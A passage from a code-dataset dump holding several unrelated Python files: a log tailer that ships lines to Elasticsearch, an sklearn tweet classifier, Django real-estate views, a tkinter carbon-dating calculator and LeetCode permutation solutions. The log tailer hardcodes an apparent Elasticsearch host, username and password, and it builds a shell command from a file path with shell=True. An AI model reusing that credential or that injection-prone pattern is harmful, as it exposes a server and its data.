"usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 182, "usage_type": "call"}, {"api_name": "wandb.log", "line_number": 188, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path", "line_number": 199, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 201, "usage_type": "call"}, {"api_name": "wandb.init", "line_number": 218, "usage_type": "call"}, {"api_name": "wandb.watch", "line_number": 227, "usage_type": "call"}, {"api_name": "torch.nn.L1Loss", "line_number": 229, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 229, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 236, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 278, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 278, "usage_type": "attribute"}, {"api_name": "yaml.load", "line_number": 291, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 291, "usage_type": "attribute"}, {"api_name": "re.split", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 315, "usage_type": "call"}, {"api_name": "re.split", "line_number": 329, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 334, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 339, "usage_type": "call"}]} +{"seq_id": "331470287", "text": "import subprocess\nimport datetime\nimport re\nfrom functools import partial\nimport _thread\nimport time\nimport sys\nfrom .line_parser.django import join_line\nfrom .line_parser.django import django_log_parsers,django_process_parsers\nfrom .line_parser.nginx import nginx_log_parser,nginx_log_full_parser\nimport inspect\n\nimport os\nimport logging\n\ngeneral_log = logging.getLogger('general_log')\n\nclass DFileBeat(object):\n def __init__(self, harvest, parsers,outputs,beat_span=5):\n self.harvest=harvest\n self.parsers = parsers\n self.outputs = outputs\n self.beat_span = beat_span\n \n def run(self):\n self.cache_list = []\n self.harvest(self)\n self.beat()\n\n \n def beat(self):\n while True:\n #print('心跳')\n out_list = self.cache_list\n self.cache_list =[]\n if not out_list:\n time.sleep(self.beat_span)\n continue\n try:\n for parser in self.parsers:\n out_list = parser(out_list)\n for output in self.outputs:\n if hasattr(output,'send'):\n output.send(out_list)\n else:\n output(self,out_list)\n \n #except UserWarning as e:\n #print(e)\n #print('debug syntax')\n except Exception as e:\n general_log.debug(out_list)\n general_log.error('[ERROR]=======> parse or send log get Exception')\n general_log.error(e,exc_info=True) \n \n time.sleep(self.beat_span)\n\n\ndef multi_tail_file(path_list,self):\n for path in path_list:\n if not os.path.exists(path):\n pathdir = os.path.dirname(path)\n try:\n os.makedirs(pathdir)\n except:\n pass\n with open(path,'w') as f:\n pass\n \n #not_exist = True\n #while not_exist:\n #not_exist= False\n #for path in path_list:\n #if not os.path.exists(path):\n #general_log.info('%s not exist;check again after 2 seconds'%path)\n #not_exist = True\n #time.sleep(2)\n #break\n \n self.running_thread =[]\n for path in path_list:\n self.running_thread.append(\n _thread.start_new_thread(tail_file,(path, self))\n )\n\ndef tail_file(path,self):\n general_log.debug('watching path:%s'%path)\n if sys.platform=='win32':\n p = subprocess.Popen('tail -f %s'%path,stdout= subprocess.PIPE,shell=True)\n 
else:\n p = subprocess.Popen('tail -F %s'%path,stdout= subprocess.PIPE,shell=True)\n start_now = datetime.datetime.now()\n record = False\n while p.poll() is None:\n line = p.stdout.readline()\n line_temp = line.strip()\n if not record:\n now = datetime.datetime.now()\n if now- start_now > datetime.timedelta(seconds =2):\n record = True\n general_log.debug('start recording')\n if line_temp and record:\n self.cache_list.append( {'path':path,'message':line} )\n\n\nif __name__ =='__main__':\n from . output.elastic import elastice_output\n pp = DFileBeat(harvest= partial(multi_tail_file,\n [\n r'D:\\coblan\\py3\\fastdog\\maintain\\filebeat\\test_ok.log',\n r'D:\\coblan\\py3\\fastdog\\maintain\\filebeat\\test_ok2.log'\n ]),\n parsers =[\n decode_utf8,\n join_line,\n partial(strip_word,'level'),\n partial(strip_span,'@timestamp',23), datetime_timestamp,\n \n ],\n outputs = [\n partial(elastice_output,'z.enjoyst.com:9200','elastic','he27375089','beat-test')\n ] )\n pp.run()\n \n", "sub_path": "maintain/filebeat/dfilebeat.py", "file_name": "dfilebeat.py", "file_ext": "py", "file_size_in_byte": 4072, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 37, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 64, "usage_type": "call"}, {"api_name": "_thread.start_new_thread", "line_number": 83, "usage_type": "call"}, {"api_name": "sys.platform", "line_number": 88, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 89, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 89, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 91, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 91, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 92, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 92, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 98, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 99, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 108, "usage_type": "call"}, {"api_name": "line_parser.django.join_line", "line_number": 115, "usage_type": "name"}, {"api_name": "functools.partial", "line_number": 116, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 117, "usage_type": "call"}, {"api_name": "functools.partial", "line_number": 121, "usage_type": "call"}, {"api_name": "output.elastic.elastice_output", "line_number": 121, "usage_type": "argument"}]} +{"seq_id": "531754766", "text": "# pylint: disable=too-many-locals\nimport os\nimport argparse\n\nimport argcomplete\nimport numpy as np\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier, GradientBoostingClassifier\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import 
classification_report\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import GridSearchCV\n\nfrom ml import modelsaving, features\nfrom preprocessing import cleantext\n\nTWEET_COLUMN = 'tweet'\nLABEL_COLUMN = 'label'\n\nRANDOM_STATE = 42\n\n\ndef _get_model_by_name(model_type: str):\n if model_type == \"LogisticRegression\":\n model = LogisticRegression(random_state=RANDOM_STATE)\n elif model_type == \"SVC\":\n model = SVC(random_state=RANDOM_STATE)\n elif model_type == \"RandomForestClassifier\":\n model = RandomForestClassifier(random_state=RANDOM_STATE)\n elif model_type == \"GradientBoostingClassifier\":\n model = GradientBoostingClassifier(random_state=RANDOM_STATE)\n elif model_type == \"ExtraTreesClassifier\":\n model = ExtraTreesClassifier(random_state=RANDOM_STATE)\n elif model_type == 'MultinomialNB':\n model = MultinomialNB()\n else:\n raise ValueError(\"Unknown model type\")\n print(\"Model type is: {}\".format(model_type))\n return model\n\n\ndef train(input_train_csv: str,\n input_test_csv: str,\n model_type: str,\n output_dir: str,\n k_related_terms: str) -> None:\n print(\"Reading files\")\n train_df = pd.read_csv(input_train_csv)\n test_df = pd.read_csv(input_test_csv)\n\n print(\"Encoding labels\")\n y_train = train_df[LABEL_COLUMN].to_list()\n labels = list(set(y_train))\n y_test = test_df[LABEL_COLUMN].to_list()\n label_encoder = LabelEncoder()\n label_encoder.fit(labels)\n vec_y_cat_train = label_encoder.transform(y_train)\n vec_y_cat_test = label_encoder.transform(y_test)\n\n x_train = train_df[TWEET_COLUMN].apply(cleantext.clean_tweet).to_list()\n\n # get model by its name\n single_model = _get_model_by_name(model_type)\n\n print(\"Vectorizing training data\")\n vectorizer = TfidfVectorizer(ngram_range=(1, 2))\n x_train_tfidf = vectorizer.fit_transform(x_train)\n\n # hyper parameters for each model\n parameters = {\n 'LogisticRegression': {'penalty': ['l2'],\n 'solver': ['liblinear', 'lbfgs'],\n 'C': [1.0, 10]},\n 'ExtraTreesClassifier': {'n_estimators': [16, 32]},\n 'RandomForestClassifier': {'n_estimators': [16, 32]},\n 'GradientBoostingClassifier': {'n_estimators': [16, 32], 'learning_rate': [0.8, 1.0]},\n 'SVC': [\n {'kernel': ['rbf'], 'gamma': [1e-3, 1e-4], 'C': [1, 10, 100]},\n {'kernel': ['linear'], 'C': [1, 10, 100]}\n ]\n }\n\n # grid search cross-validation\n clf = GridSearchCV(single_model,\n parameters[model_type],\n cv=5,\n verbose=3,\n n_jobs=-1,\n scoring='accuracy',\n refit=True)\n\n print(\"Training\")\n clf.fit(x_train_tfidf, vec_y_cat_train)\n\n print(\"Best parameters on the validation test:\")\n print(clf.best_params_)\n\n print(\"Grid scores on validation set:\")\n means = clf.cv_results_['mean_test_score']\n stds = clf.cv_results_['std_test_score']\n for mean, std, params in zip(means, stds, clf.cv_results_['params']):\n print(\"%0.3f (+/-%0.03f) for %r\" % (mean, std * 2, params))\n print()\n\n print(\"Saving model\")\n model_dir = os.path.join(output_dir, model_type)\n modelsaving.save_model(clf.best_estimator_, model_dir)\n modelsaving.save_vectorizer(vectorizer, model_dir)\n modelsaving.save_label_encoder(label_encoder, model_dir)\n\n print(\"Predicting training set\")\n predicted = clf.predict(x_train_tfidf)\n accuracy = np.mean(predicted == vec_y_cat_train)\n print(\"Accuracy on train set: {}\".format(accuracy))\n\n print(\"Vectorizing test data\")\n x_test = test_df[TWEET_COLUMN].apply(cleantext.clean_tweet).to_list()\n x_test_tfidf 
= vectorizer.transform(x_test)\n\n    print(\"Predicting test set\")\n    predicted = clf.predict(x_test_tfidf)\n    accuracy = np.mean(predicted == vec_y_cat_test)\n\n    print(\"Accuracy on test set: {}\".format(accuracy))\n    target_names = [str(class_name) for class_name in label_encoder.classes_]\n    print(classification_report(vec_y_cat_test,\n                                predicted,\n                                target_names=target_names))\n\n    print(\"Plotting top K features for each class\")\n    features.plot_top_k_features(vectorizer, clf.best_estimator_, model_dir, k_related_terms)\n\n\ndef main():\n    argument_parser = argparse.ArgumentParser()\n    argument_parser.add_argument(\"--input-train\", type=str,\n                                 help='Input CSV file containing training tweets', required=True)\n    argument_parser.add_argument(\"--input-test\", type=str,\n                                 help='Input CSV file containing test tweets', required=True)\n    argument_parser.add_argument(\"--model\", type=str,\n                                 help='Model type to train', default='SVC', required=False)\n    argument_parser.add_argument(\"--output-dir\", type=str, help='Directory for output', required=True)\n    argument_parser.add_argument(\"--k-related-terms\", type=int,\n                                 help='Number of related terms to output per company. Default: 10', required=False,\n                                 default=10)\n    argcomplete.autocomplete(argument_parser)\n    args = argument_parser.parse_args()\n    train(args.input_train, args.input_test, args.model, args.output_dir, args.k_related_terms)\n\n\nif __name__ == '__main__':\n    main()\n", "sub_path": "src/ml/trainingclassifier.py", "file_name": "trainingclassifier.py", "file_ext": "py", "file_size_in_byte": 5933, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.ensemble.ExtraTreesClassifier", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.MultinomialNB", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 51, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 52, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 58, "usage_type": "call"}, {"api_name": "preprocessing.cleantext.clean_tweet", "line_number": 63, "usage_type": "attribute"}, {"api_name": "preprocessing.cleantext", "line_number": 63, "usage_type": "name"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 69, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 109, "usage_type": "call"}, {"api_name": "os.path", "line_number": 109, "usage_type": "attribute"}, {"api_name": "ml.modelsaving.save_model", "line_number": 110, "usage_type": "call"}, {"api_name": "ml.modelsaving", "line_number": 110, "usage_type": "name"}, {"api_name": "ml.modelsaving.save_vectorizer", "line_number": 111, "usage_type": "call"}, {"api_name": "ml.modelsaving", "line_number": 111, "usage_type": "name"}, {"api_name": "ml.modelsaving.save_label_encoder", "line_number": 112, "usage_type": "call"}, {"api_name": "ml.modelsaving", "line_number": 112, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 116, "usage_type": 
"call"}, {"api_name": "preprocessing.cleantext.clean_tweet", "line_number": 120, "usage_type": "attribute"}, {"api_name": "preprocessing.cleantext", "line_number": 120, "usage_type": "name"}, {"api_name": "numpy.mean", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 129, "usage_type": "call"}, {"api_name": "ml.features.plot_top_k_features", "line_number": 134, "usage_type": "call"}, {"api_name": "ml.features", "line_number": 134, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 138, "usage_type": "call"}, {"api_name": "argcomplete.autocomplete", "line_number": 149, "usage_type": "call"}]} +{"seq_id": "618082353", "text": "from django.shortcuts import render\n\nfrom django.shortcuts import render\nfrom django.http.response import HttpResponse\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom django.shortcuts import render_to_response\n\nfrom .models import Object, ObjectSearch, News, Agency\n\n\ndef index(request):\n\t\t\n\tobject = Object.objects.filter(publication=\"yes\")\n\tTotal = News.objects.filter().count()\n\t\n\tpopular = Object.objects.filter(publication=\"yes\").filter(rating=5)\n\t\n\t\n\tif Total > 3:\n\t\tnews = News.objects.filter()[Total-3:Total]\n\telse:\n\t\tnews = News.objects.filter()[0:3] \n \n\tf = ObjectSearch(request.GET, queryset=object)\n\t\t\n\t\n\t\t\t\n\t\n\treturn render_to_response('index.html', {'filter':f,'object':object,'news':news, 'popular':popular})\n\t\ndef detail(request,num):\n\tobject = Object.objects.get(pk=int(num))\n\tcod = object.code\n\tprice_min = int(int(object.object_price) - 300000)\n\tprice_max = int(int(object.object_price) + 300000)\n\t\t\n\tagents = Object.objects.filter(code = cod)\n\tclon = Object.objects.raw('SELECT * FROM estate_object')\n\t\n\t\n\t\n\t\n\treturn render_to_response('house-object-new.html',{'object': object,'code':cod,'agent':agents,'clon':clon})\n\t\n\ndef news(request, num):\n\tnews = News.objects.get(id = int(num))\n\treturn render_to_response('news-page.html',{'news': news, 'num':num})\t\n\ndef newslist(request):\n\tnews = News.objects.all()\n\treturn render_to_response('news-list.html',{'news': news})\n\t\ndef agency(request,param):\n\tagency = Agency.objects.get(name=param)\n\treturn render_to_response('agensy.html',{'agency':agency})\n\t", "sub_path": "estate/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1568, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "models.Object.objects.filter", "line_number": 14, "usage_type": "call"}, {"api_name": "models.Object.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "models.Object", "line_number": 14, "usage_type": "name"}, {"api_name": "models.News.objects.filter", "line_number": 15, "usage_type": "call"}, {"api_name": "models.News.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.News", "line_number": 15, "usage_type": "name"}, {"api_name": "models.Object.objects.filter", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Object.objects", "line_number": 17, "usage_type": "attribute"}, {"api_name": "models.Object", "line_number": 17, "usage_type": "name"}, {"api_name": "models.News.objects.filter", "line_number": 21, "usage_type": "call"}, {"api_name": "models.News.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.News", "line_number": 21, 
"usage_type": "name"}, {"api_name": "models.News.objects.filter", "line_number": 23, "usage_type": "call"}, {"api_name": "models.News.objects", "line_number": 23, "usage_type": "attribute"}, {"api_name": "models.News", "line_number": 23, "usage_type": "name"}, {"api_name": "models.ObjectSearch", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Object.objects.get", "line_number": 33, "usage_type": "call"}, {"api_name": "models.Object.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.Object", "line_number": 33, "usage_type": "name"}, {"api_name": "models.Object.objects.filter", "line_number": 38, "usage_type": "call"}, {"api_name": "models.Object.objects", "line_number": 38, "usage_type": "attribute"}, {"api_name": "models.Object", "line_number": 38, "usage_type": "name"}, {"api_name": "models.Object.objects.raw", "line_number": 39, "usage_type": "call"}, {"api_name": "models.Object.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "models.Object", "line_number": 39, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 44, "usage_type": "call"}, {"api_name": "models.News.objects.get", "line_number": 48, "usage_type": "call"}, {"api_name": "models.News.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "models.News", "line_number": 48, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 49, "usage_type": "call"}, {"api_name": "models.News.objects.all", "line_number": 52, "usage_type": "call"}, {"api_name": "models.News.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "models.News", "line_number": 52, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 53, "usage_type": "call"}, {"api_name": "models.Agency.objects.get", "line_number": 56, "usage_type": "call"}, {"api_name": "models.Agency.objects", "line_number": 56, "usage_type": "attribute"}, {"api_name": "models.Agency", "line_number": 56, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "480895804", "text": "#Autor: Johan David Gomez Gil\r\n#Correo: johang0297@gmail.com\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nfrom tkinter import *\r\n\r\ndef calcular_edad(masaInicial,masaFinal,vidaMedia):\r\n\r\n prim = math.log(masaFinal/masaInicial)\r\n seg = math.log(2)\r\n x = (-vidaMedia*(prim)) / seg\r\n x = round(x,4)\r\n #print (x)\r\n return x\r\n\r\ndef graficar(masaInicial,masaFinal,vidaMedia):\r\n masaInicial = float(masaInicial)\r\n masaFinal = float(masaFinal)\r\n edad = calcular_edad(masaInicial,masaFinal,vidaMedia)\r\n texto = 'Interseccion (x = ',edad,' , y = 0)'\r\n x=np.linspace(-600,60000,10000) #Los dos primeros son el rango de X y el ultimo cuantos puntos se quieren\r\n #x=np.arange(14000,15000,1)\r\n\r\n plt.plot(x,h(x,masaInicial,masaFinal,vidaMedia))\r\n plt.grid(True)\r\n plt.text(edad,0,texto)\r\n v = [0,65000,-200,200]\r\n plt.axis(v)\r\n plt.ylabel('Y')\r\n plt.xlabel('X')\r\n plt.show()\r\n\r\ndef h(x,masaInicial,masaFinal,vidaMedia):\r\n #expo = np.e ** ((-x*math.log(2))/5730)\r\n y = masaFinal - masaInicial *(np.e ** ((-x*math.log(2))/vidaMedia))\r\n return y\r\n\r\n\r\n\r\n\r\n#----------------------------Interfaz grafica--------------------------------------------\r\n\r\ndef edad():\r\n\r\n raiz = 
Tk()\r\n\r\n raiz.title(\"Simulación\")\r\n\r\n opciones = Frame()\r\n opciones.pack(side =\"left\")\r\n opciones.config(width = \"100\", height = \"420\", bd = 3,relief =\"groove\")\r\n\r\n tituloOpciones = Label(opciones, text= \"Opciones\", font = (13))\r\n tituloOpciones.place(x=11,y=0)\r\n\r\n\r\n principal = Frame()\r\n principal.pack(side =\"right\")\r\n principal.config(width = \"650\", height = \"450\")\r\n\r\n masaInicial = Entry(principal)\r\n masaInicial.grid(row= 0, column = 1, pady = 10)\r\n tituloMasaInicial = Label(principal, text= \"Masa inicial: \", font = (13))\r\n tituloMasaInicial.grid(row= 0, column = 0, padx = 20)\r\n\r\n\r\n\r\n masaActual = Entry(principal)\r\n masaActual.grid(row= 1, column = 1, pady = 10)\r\n tituloMasaActual = Label(principal, text= \"Masa actual: \", font = (13))\r\n tituloMasaActual.grid(row= 1, column = 0, padx = 20)\r\n\r\n\r\n #----------------------RESULTADO-----------------------------------------------\r\n\r\n resultadoEdad = StringVar()\r\n\r\n resultado = Entry(principal, textvariable = resultadoEdad)\r\n resultado.grid(row= 2, column = 1, pady = 10, padx = 20)\r\n tituloResultado = Label(principal, text= \"Resultado: \", font = (13))\r\n tituloResultado.grid(row= 2, column = 0, padx = 20)\r\n\r\n #-------Funcion para el boton calcular------------------------------------------\r\n\r\n def calcular(masaInicial,masaFinal,vidaMedia):\r\n\r\n masaIn = float(masaInicial)\r\n masaFin = float(masaFinal)\r\n resultado = calcular_edad(masaIn,masaFin,vidaMedia)\r\n resultadoEdad.set(resultado)\r\n\r\n botonCalcular = Button(principal, text = \"Calcular\", command= lambda: calcular(masaInicial.get(),masaActual.get(),5730))\r\n botonCalcular.grid(row= 2, column = 2, pady = 10)\r\n\r\n botonGraficar = Button(principal, text = \"Graficar\", command= lambda: graficar(masaInicial.get(),masaActual.get(),5730))\r\n botonGraficar.grid(row= 3, column = 0, pady = 10)\r\n botonGraficar.config(width = \"10\", height = \"5\")\r\n\r\n botonSalir = Button(principal, text = \"Salir\" , command = raiz.destroy)\r\n botonSalir.grid(row= 3, column = 1, pady = 10, columnspan=2)\r\n botonSalir.config(width = \"10\", height = \"5\")\r\n \r\n\r\n botonEdad = Button(opciones, text = \"Calcular edad\")\r\n botonEdad.place(x = 5, y= 30)\r\n \r\n\r\n botonVida = Button(opciones, text = \"Calcular vida\\n media\")\r\n botonVida.place(x = 5, y= 60) \r\n\r\n raiz.resizable(0,0)\r\n\r\n raiz.mainloop()\r\n\r\nedad()", "sub_path": "edad.pyw", "file_name": "edad.pyw", "file_ext": "pyw", "file_size_in_byte": 3696, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "math.log", "line_number": 11, "usage_type": "call"}, {"api_name": "math.log", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 27, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", 
"line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "numpy.e", "line_number": 37, "usage_type": "attribute"}, {"api_name": "math.log", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "366302414", "text": "\"\"\"\nhttps://leetcode.com/problems/permutations-ii/\nLC047 Permutations II\nMedium\n\nGiven a collection of numbers that might contain duplicates, return all possible unique permutations.\n\"\"\"\n\nfrom itertools import permutations\nfrom math import factorial\nfrom typing import *\n\n\nclass Solution_A1:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n \"\"\"\n use python's internal method, only for testing the speed\n Only permute the idx (non-repeating), as a proxy method, but check repeat after put back to elements\n It is not necessary to use proxy\n \"\"\"\n result = []\n for idxs in permutations(list(range(len(nums)))):\n next_perm = [nums[i] for i in idxs]\n if next_perm not in result:\n result.append(next_perm)\n return result\n\n\nclass Solution_A2:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n \"\"\"\n use python's internal method, only for testing the speed\n Non-proxy version of A1\n \"\"\"\n result = []\n for p in permutations(nums):\n lp = list(p)\n if lp not in result:\n result.append(lp)\n return result\n\n\nclass Solution_B:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n \"\"\"\n Use next nextPermutation from LC031, but use proxy to avoid repeating causing comparison error\n First handle index, then convert to nuns[index], if not repeating then append.\n\n This will pass but way too slow\n revised to use set(tuples) to removed repeats, then sort, it is faster, but still slow\n \"\"\"\n total_n = factorial(len(nums))\n result = []\n idxs = list(range(len(nums)))\n\n for _ in range(total_n):\n each_perm = [nums[i] for i in idxs]\n if each_perm not in result:\n result.append(each_perm)\n self.nextPermutation(idxs)\n\n return result\n\n def nextPermutation(self, nums: List[int]) -> None:\n \"\"\"\n Helper function from LC031\n \"\"\"\n\n if not nums:\n return None\n\n # 从后往前找到第一次出现下降趋势那个元素\n first_idx = len(nums) - 2\n second_idx = len(nums) - 1\n\n # 先定位first_idx\n while first_idx >= 0 and nums[first_idx] >= nums[first_idx + 1]:\n first_idx -= 1\n\n if first_idx == -1: # 如果完美倒序上升,则已经逆序排好,直接反转即可\n nums[:] = nums[:][::-1] # nums.reverse()\n else:\n # 定位second_idx\n # 由于尾部已经是逆序排好, 所以从尾部开始倒退,第一个>first_element的元素就是second_element\n while nums[second_idx] <= nums[first_idx]:\n second_idx -= 1\n\n # complete the swap\n nums[first_idx], nums[second_idx] = nums[second_idx], nums[first_idx]\n # reverse element after first_idx\n nums[first_idx + 1:] = nums[first_idx + 1:][::-1]\n\n\n\nclass Solution_C1:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n \"\"\"\n recursive method modified from leetcode LC046 Version C\n revised the recursion rule by bypassing the repeated next_list\n \"\"\"\n\n def permuteUniHelper(lst: List[int], permute_list: List[int] = []) -> None:\n \"\"\"Helper from LC046 Version C\"\"\"\n\n if len(lst) == 0: # all elements got picked\n result.append(permute_list)\n else:\n sub_list_check = [] # 
create a next_list_list\n for i in range(len(lst)):\n sub_list = lst[:] # it will be the sub-list after the pop\n picked = sub_list.pop(i)\n\n # must check on sorted to avoid same sub_list in different sequence!\n sub_list_sorted = sorted(sub_list)\n\n # Modification: Recursively removing repeating sub_list through each pick\n if sub_list_sorted not in sub_list_check:\n sub_list_check.append(sub_list_sorted)\n updated_permute_list = permute_list + [picked]\n permuteUniHelper(sub_list, updated_permute_list)\n\n result = []\n permuteUniHelper(nums)\n return result\n\n\nclass Solution_C2:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n \"\"\"\n Version C1 modified\n Sort nums first to avoid sort sub_list check for repeating\n\n So far, this is the best solution\n \"\"\"\n\n def permuteUniHelper(lst: List[int], permute_list: List[int] = []) -> None:\n \"\"\"Helper from LC046 Version C\"\"\"\n\n if len(lst) == 0:\n result.append(permute_list)\n else:\n sub_list_check = [] # create a next_list_list\n for i in range(len(lst)):\n sub_list = lst[:] # it will be the sub-list after the pop\n picked = sub_list.pop(i)\n\n if sub_list not in sub_list_check:\n sub_list_check.append(sub_list)\n updated_permute_list = permute_list + [picked]\n permuteUniHelper(sub_list, updated_permute_list)\n\n nums = sorted(nums) # sort first to avoid repeating issue\n result = []\n permuteUniHelper(nums)\n return result\n\n\n\nclass Solution_D:\n def permuteUnique(self, nums: List[int]):\n \"\"\"\n Pure recursive method, single and pure recursion modified from leetcode LC046 version D\n Revised the recursion rule by bypassing the repeated next_list\n\n Must sort sub_list for checking repeat, unlike version C\n The sort nums can not be separated from main function, like the way version C uses helper\n \"\"\"\n\n length = len(nums)\n if length == 1:\n return [nums]\n else:\n result = []\n sub_list_check = [] # add an intermediate step to prevent repeats\n for i in range(len(nums)):\n sub_list = nums[:]\n picked = sub_list.pop(i)\n\n # must check on sorted to avoid same sub_list in different sequence!\n sub_list_sorted = sorted(sub_list)\n\n # Recursively removing repeating sub_list through each pick\n if sub_list_sorted not in sub_list_check:\n sub_list_check.append(sub_list_sorted)\n result += [[picked] + per for per in self.permuteUnique(sub_list)]\n return result\n\n\n\nif __name__ == \"__main__\":\n testCase = Solution_C2()\n assert testCase.permuteUnique([1]) == [\n [1]\n ], \"Edge 1\"\n\n assert sorted(testCase.permuteUnique([1, 2, 3])) == [\n [1, 2, 3],\n [1, 3, 2],\n [2, 1, 3],\n [2, 3, 1],\n [3, 1, 2],\n [3, 2, 1]\n ], \"Example 1\"\n\n assert sorted(testCase.permuteUnique([3, 2, 1])) == [\n [1, 2, 3],\n [1, 3, 2],\n [2, 1, 3],\n [2, 3, 1],\n [3, 1, 2],\n [3, 2, 1]\n ], \"Example 1 addtional\"\n\n assert sorted(testCase.permuteUnique([1, 1, 2])) == [\n [1, 1, 2],\n [1, 2, 1],\n [2, 1, 1]\n ], \"Example 2\"\n\n assert sorted(testCase.permuteUnique([2, 1, 1])) == [\n [1, 1, 2],\n [1, 2, 1],\n [2, 1, 1]\n ], \"Example 2 additional\"\n\n\n assert sorted(testCase.permuteUnique([3, 3, 0, 3])) == [\n [0, 3, 3, 3],\n [3, 0, 3, 3],\n [3, 3, 0, 